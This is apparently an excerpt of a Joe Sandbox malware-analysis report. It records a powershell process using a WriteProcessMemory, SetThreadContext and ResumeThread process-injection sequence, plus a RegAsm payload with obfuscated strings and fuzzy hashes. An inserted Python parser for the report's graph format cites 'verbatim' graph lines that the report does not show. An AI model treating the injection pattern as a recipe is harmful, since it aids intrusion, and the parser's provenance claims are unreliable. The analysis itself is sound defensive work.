                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 037467D8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: eedc8ed62ca391790b8400448ddab762d1b071d730b3d708e06cb32d0a22ad36
                                                            • Instruction ID: 82734ef1603544d002d8a4248374cf1c1fb6c896952073f6fad9c15f9a68d628
                                                            • Opcode Fuzzy Hash: eedc8ed62ca391790b8400448ddab762d1b071d730b3d708e06cb32d0a22ad36
                                                            • Instruction Fuzzy Hash: 602148759003499FDB10CFAAC981BDEBBF5FF48310F148429E918A7240D778A954CBA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 3746748; WriteProcessMemory is called from block 37467a6-37467e5
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 037467D8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 03d0ed365358bd04a35b520cb6327d42044719cfedd7e4a0a7decf79f121f37d
                                                            • Instruction ID: f4531b773f6ece345d56cdc568e8fbe3b9bb575033b6cc62b576933d678a1c77
                                                            • Opcode Fuzzy Hash: 03d0ed365358bd04a35b520cb6327d42044719cfedd7e4a0a7decf79f121f37d
                                                            • Instruction Fuzzy Hash: EA2127759003499FDF10DFAAC981BDEBBF5FF88310F148429E918A7240C778A954CBA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 37465a8; Wow64SetThreadContext is called from block 374660b-374663b
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0374662E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 873b593df327478f9adc01dddb5dcd371a130a85f45cb8907e3185da2e849f96
                                                            • Instruction ID: 43eac616a3ea7ad593c56d8033682459be086b28a07345cfc18e08fbf6204c8f
                                                            • Opcode Fuzzy Hash: 873b593df327478f9adc01dddb5dcd371a130a85f45cb8907e3185da2e849f96
                                                            • Instruction Fuzzy Hash: F9213A719003098FDB10DFAAC4857EEFBF4EF48324F148429D819A7240CB78A945CFA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 37465b0; Wow64SetThreadContext is called from block 374660b-374663b
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0374662E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: db2279fc09d75231ad3048aff490dc5202d3fc3c28b2eb56f26ebe20eb43a8f0
                                                            • Instruction ID: f2d0b83924f5a8f3d9dd329883f020b9e8a005ac72ffa844a08c5cc33823015b
                                                            • Opcode Fuzzy Hash: db2279fc09d75231ad3048aff490dc5202d3fc3c28b2eb56f26ebe20eb43a8f0
                                                            • Instruction Fuzzy Hash: C12147719003098FDB10DFAAC4857EEFBF4EF88324F14842AD819A7240CB78A945CFA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 37464f8; ResumeThread is called from block 37464f8-374656f
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: efa5671608a9fb51f69b166d603f5eddf89283071013d7fb4d2a4c261510c05d
                                                            • Instruction ID: 2480e98f19a879309a4047d0f33353a6250e9b9135aa0590999946910970ec2e
                                                            • Opcode Fuzzy Hash: efa5671608a9fb51f69b166d603f5eddf89283071013d7fb4d2a4c261510c05d
                                                            • Instruction Fuzzy Hash: 3B115B71C003498FDB20DFAAC4457DEFBF4EB88724F148419D429A7240CB796544CF94

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 3746500; ResumeThread is called from block 3746500-374656f
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: f9a84c2d126c7da7cad16126efde84994b3ec66dc224b28d5e97c00ca5fc241f
                                                            • Instruction ID: 295c9bd9dd99b52e9dbb9e6ffda4152a6081e3ee6017a84a8e06b335fd882862
                                                            • Opcode Fuzzy Hash: f9a84c2d126c7da7cad16126efde84994b3ec66dc224b28d5e97c00ca5fc241f
                                                            • Instruction Fuzzy Hash: 2C11F5719003498FDB24DFAAC4457AEFBF9AB88724F248429D519A7240CB79A944CFA4
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1619713096.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7d30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3f369bf1ec6b9895ca5980b60843baff4c66aac3226005c16b2d6029a7fa781
                                                            • Instruction ID: 67db11fdca869314efb17303068f4cc34aa37c049cc580639f786d067cce61fd
                                                            • Opcode Fuzzy Hash: c3f369bf1ec6b9895ca5980b60843baff4c66aac3226005c16b2d6029a7fa781
                                                            • Instruction Fuzzy Hash: 7F215CF0E082468FCB25CF69D944A65FBB1BF46321F09C0ABD444CB162D735E884CBA2
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1585922024.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_342d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67dcaf855178393ac04c9123363631a2bb95154b6ffd1234d29fc374ede0a826
                                                            • Instruction ID: aa595f292c6e50d72f317c0c4980623d59b2be56d7c782a67b9274d4f19f3b41
                                                            • Opcode Fuzzy Hash: 67dcaf855178393ac04c9123363631a2bb95154b6ffd1234d29fc374ede0a826
                                                            • Instruction Fuzzy Hash: 60012D7140E3C09FD7128B258894B56BFB8DF47224F1D81DBD8989F2A3C2695844C772
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1585922024.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_342d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bf55a0d76e687935fdf7315ac23207576caad0db4c573c83b23c553bd147fa3
                                                            • Instruction ID: b029d26439392b70af6df573ee042e8e44acecaffec83ebbab534d19320fadef
                                                            • Opcode Fuzzy Hash: 9bf55a0d76e687935fdf7315ac23207576caad0db4c573c83b23c553bd147fa3
                                                            • Instruction Fuzzy Hash: 9601F7718043149AE7208A11CC80B67FF98EF82629F18C05BEC686F292C2789842C7B6

                                                            Execution Graph

                                                            Execution Coverage:1.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:18.4%
                                                            Total number of Nodes:38
                                                            Total number of Limit Nodes:4
                                                            execution_graph (rendered graph; edge list omitted): 408850 -> 40885f -> GetCurrentProcessId/GetCurrentThreadId (40891c) -> SHGetSpecialFolderPathW/GetForegroundWindow (408945) -> 408a3d -> CoInitializeEx (40c550), with 40885f and 408ab3 leading to ExitProcess (408acf); other roots: RtlAllocateHeap (43aa8a, via 43aa80 and 43d810), CoInitializeSecurity (40c583), RtlFreeHeap (43aab8, via 43aaa0), LdrInitializeThunk (43c1f0, reached from 43c767, 43cce6 and 43c58a), CoUninitialize (40e71a), GetForegroundWindow (43ccaf, via 43c2c8)

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                            • GetForegroundWindow.USER32 ref: 00408A33
                                                              • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                              • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                              • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                            • ExitProcess.KERNEL32 ref: 00408AD1
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                            • String ID:
                                                            • API String ID: 3072701918-0
                                                            • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                            • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                            • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                            • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                                            Control-flow Graph

                                                            control_flow_graph 44 43c1f0-43c222 LdrInitializeThunk
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                            Control-flow Graph

                                                            control_flow_graph 124 43c767-43c78f 125 43c790-43c7d6 124->125 125->125 126 43c7d8-43c7e3 125->126 127 43c810-43c813 126->127 128 43c7e5-43c7f3 126->128 130 43c841-43c862 127->130 129 43c800-43c807 128->129 131 43c815-43c81b 129->131 132 43c809-43c80c 129->132 131->130 134 43c81d-43c839 call 43c1f0 131->134 132->129 133 43c80e 132->133 133->130 136 43c83e 134->136 136->130
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,+*)
                                                            • API String ID: 0-3529585375
                                                            • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                            • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                            • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                            • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

                                                            Control-flow Graph

                                                            control_flow_graph 35 40e71a-40e738 CoUninitialize * 2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Uninitialize
                                                            • String ID:
                                                            • API String ID: 3861434553-0
                                                            • Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                            • Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
                                                            • Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                            • Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

                                                            Control-flow Graph

                                                            control_flow_graph 36 43c2c8-43c2d6 37 43c2e0-43c2fd 36->37 37->37 38 43c2ff-43ccb9 GetForegroundWindow call 43e110 37->38 41 43ccbe-43ccdf 38->41
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 0043CCAF
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: ForegroundWindow
                                                            • String ID:
                                                            • API String ID: 2020703349-0
                                                            • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                            • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                            • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                            • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

                                                            Control-flow Graph

                                                            control_flow_graph 42 40c550-40c580 CoInitializeEx
                                                            APIs
                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                            • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                            • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                            • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

                                                            Control-flow Graph

                                                            control_flow_graph 43 40c583-40c5b2 CoInitializeSecurity
                                                            APIs
                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeSecurity
                                                            • String ID:
                                                            • API String ID: 640775948-0
                                                            • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                            • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                            • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                            • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

                                                            Control-flow Graph

                                                            control_flow_graph 45 43aaa0-43aaac 46 43aab3-43aabe call 43d810 RtlFreeHeap 45->46 47 43aac4-43aac5 45->47 46->47
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                            • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                            • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                            • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 50 43aa80-43aa97 call 43d810 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                            • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                            • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                            • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
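                                                            The execution_graph line under Execution Graph above and the control_flow_graph lines in the function blocks above are Joe Sandbox's serialized graphs: a node id, its address (or address range), the APIs the node calls, and id->id edges, all flattened onto one line. The Python below is an added example, not part of this report and not Joe Sandbox code; it parses that serialization and answers the questions an analyst usually has of the graph: where each chain starts, which APIs a chain reaches, and from which addresses a given API is called. The token grammar is inferred from the lines on this page and is an assumption, as are the helper names; the sample inputs are copied from the report's own lines.

```python
"""Parse the execution_graph / control_flow_graph text of a Joe Sandbox report.

Token grammar inferred from this report (an assumption for this example, not
an official format description):
  <id> <addr>         node; <addr> is a hex address or a hex range start-end
  <ApiName>           API called by the most recently declared node
  <ApiName> * <n>     the same API called <n> times in a row
  call <addr>         the most recent node calls the function at <addr>
  <id>-><id>          directed edge
"""
import re
from collections import defaultdict

ADDR_RE = re.compile(r"[0-9a-f]+(-[0-9a-f]+)?")

# Copied verbatim from the "Execution Graph" section of this report.
EXECUTION_GRAPH = (
    "execution_graph 13470 408850 13472 40885f 13470->13472 13471 408acf ExitProcess "
    "13472->13471 13473 408ab3 13472->13473 13474 40891c GetCurrentProcessId GetCurrentThreadId "
    "13472->13474 13475 408941 13474->13475 13476 408945 SHGetSpecialFolderPathW GetForegroundWindow "
    "13474->13476 13475->13476 13477 408a3d 13476->13477 13477->13473 13479 40c550 CoInitializeEx "
    "13477->13479 13432 43aa80 13435 43d810 13432->13435 13434 43aa8a RtlAllocateHeap 13436 43d830 "
    "13435->13436 13436->13434 13436->13436 13437 40c583 CoInitializeSecurity 13443 43aaa0 "
    "13444 43aab3 13443->13444 13445 43aac4 13443->13445 13446 43aab8 RtlFreeHeap 13444->13446 "
    "13446->13445 13447 43c767 13449 43c790 13447->13449 13448 43c80e 13449->13448 "
    "13451 43c1f0 LdrInitializeThunk 13449->13451 13451->13448 13452 43cce6 13453 43cd00 "
    "13452->13453 13455 43cd6e 13453->13455 13459 43c1f0 LdrInitializeThunk 13453->13459 "
    "13458 43c1f0 LdrInitializeThunk 13455->13458 13457 43ce4d 13458->13457 13459->13455 "
    "13460 43c58a 13462 43c460 13460->13462 13461 43c5f4 13462->13461 "
    "13465 43c1f0 LdrInitializeThunk 13462->13465 13464 43c54d 13465->13464 "
    "13485 40e71a CoUninitialize CoUninitialize 13466 43c2c8 13467 43c2e0 13466->13467 "
    "13467->13467 13468 43ccaf GetForegroundWindow 13467->13468 13469 43ccbe 13468->13469"
)

# Copied verbatim from two "Control-flow Graph" blocks of this report.
CFG_FOREGROUND = (
    "control_flow_graph 36 43c2c8-43c2d6 37 43c2e0-43c2fd 36->37 37->37 "
    "38 43c2ff-43ccb9 GetForegroundWindow call 43e110 37->38 41 43ccbe-43ccdf 38->41"
)
CFG_UNINIT = "control_flow_graph 35 40e71a-40e738 CoUninitialize * 2"


def parse_graph(text):
    """Return (nodes, edges).

    nodes: id -> {"addr": str, "apis": [str], "calls": [str]}
    edges: id -> [successor ids], in the order the report lists them
    """
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(list)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if "->" in tok:
            src, dst = tok.split("->", 1)
            edges[int(src)].append(int(dst))
            i += 1
            continue
        if tok.isdigit() and nxt is not None and ADDR_RE.fullmatch(nxt):
            # Node declaration. The address is consumed here unconditionally,
            # so an all-digit address such as 408850 is never read as an id.
            current = int(tok)
            nodes[current] = {"addr": nxt, "apis": [], "calls": []}
            i += 2
            continue
        if current is None:
            raise ValueError(f"attribute {tok!r} before any node declaration")
        if tok == "call" and nxt is not None:
            nodes[current]["calls"].append(nxt)
            i += 2
        elif tok == "*" and nxt is not None and nxt.isdigit():
            # "Api * n": the report collapses n consecutive calls of one API.
            apis = nodes[current]["apis"]
            if not apis:
                raise ValueError(f"multiplier without an API in node {current}")
            apis.extend([apis[-1]] * (int(nxt) - 1))
            i += 2
        else:
            nodes[current]["apis"].append(tok)
            i += 1
    return nodes, dict(edges)


def entry_nodes(nodes, edges):
    """Nodes with no incoming edge: where the sandbox saw each chain start."""
    targets = {d for succ in edges.values() for d in succ}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, start):
    """APIs on any path from `start`, in DFS discovery order, de-duplicated.
    The visited set terminates self-loops such as 13436->13436."""
    seen, stack, apis = set(), [start], []
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        for api in nodes.get(n, {"apis": []})["apis"]:
            if api not in apis:
                apis.append(api)
        stack.extend(reversed(edges.get(n, [])))
    return apis


def api_sites(nodes, api):
    """Addresses of every node that calls `api` (e.g. the LdrInitializeThunk
    sites, which in this dump all resolve to 43c1f0)."""
    return sorted(info["addr"] for info in nodes.values() if api in info["apis"])


if __name__ == "__main__":
    nodes, edges = parse_graph(EXECUTION_GRAPH)
    print(len(nodes), "nodes,", sum(map(len, edges.values())), "edges")
    for root in entry_nodes(nodes, edges):
        print(f"{root} @ {nodes[root]['addr']}: {reachable_apis(nodes, edges, root)}")
```

                                                            Run against the report's line, the parser recovers the 38 nodes the header states, and the chain rooted at 408850 reaches GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, GetForegroundWindow, CoInitializeEx and ExitProcess, which is the API list the first function block above reports; the CFG inputs exercise the "call <addr>" and "* n" forms that only appear in control_flow_graph lines.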
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                            • API String ID: 0-3492884535
                                                            • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                            • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                            • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                            • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                            • API String ID: 0-1763234448
                                                            • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                            • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                            • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                            • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                            APIs
                                                              • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                            • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                            • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary$InitializeThunk
                                                            • String ID: / $/,-$Wu$46
                                                            • API String ID: 764372645-3330591033
                                                            • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                            • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                            • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                            • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                            • API String ID: 0-1826372655
                                                            • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                            • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                            • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                            • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                            Strings
                                                            Memory Dump Source
